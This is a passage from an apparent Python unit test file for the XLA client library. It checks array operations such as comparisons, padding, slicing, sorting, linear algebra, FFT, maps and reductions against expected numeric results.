_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), [(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testReducePrecision(self):
c = self._NewComputation()
c.ReducePrecision(
c.Constant(NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[float.fromhex("0x1.32p-3")])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(
c.Constant(NumpyArrayF32(0.)),
c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayF32(lo)),
c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayS32(lo)),
c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
c.Sort(c.Constant(keys))
self._ExecuteAndCompareClose(
c, expected=np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32))
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)), dimension=0)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = b.ParameterFromNumpy(NumpyArrayF32(0))
q0 = b.ParameterFromNumpy(NumpyArrayF32(0))
p1 = b.ParameterFromNumpy(NumpyArrayS32(0))
q1 = b.ParameterFromNumpy(NumpyArrayS32(0))
b.Or(b.Lt(p0, q0), b.And(b.Eq(p0, q0), b.Gt(p1, q1)))
comparator = b.Build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
c.Eigh(c.Constant(a), full_matrices=True)
# TODO(b/129396575): Turn this test back on when it passes without fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.SVD(c.Constant(a))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(
c.Constant(a_vals),
c.Constant(b_vals),
left_side=False,
lower=True,
transpose_a=True)
self._ExecuteAndCompareClose(
c,
expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32),
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.fftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# IFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.ifftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
c.Fft(c.Constant(b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.rfftn(b, axes=(1, 2, 3)),
rtol=1e-4)
# IRFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(c, expected=np.fft.irfftn(a, axes=(1, 2, 3)),
rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
c.NextAfter(
c.Constant(np.array([1, 2], dtype=np.float32)),
c.Constant(np.array([2, 1], dtype=np.float32)))
out = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(np.array([eps + 1, 2 - eps], dtype=np.float32), out)
def testRegularizedIncompleteBeta(self):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538])
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606])
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677])
c = self._NewComputation()
c.RegularizedIncompleteBeta(c.Constant(a), c.Constant(b), c.Constant(x))
expected = np.array([0.98923271, 0.48575411, 0.57952568, 0.12579775,
0.96989155])
self._ExecuteAndCompareClose(c, expected=expected, rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
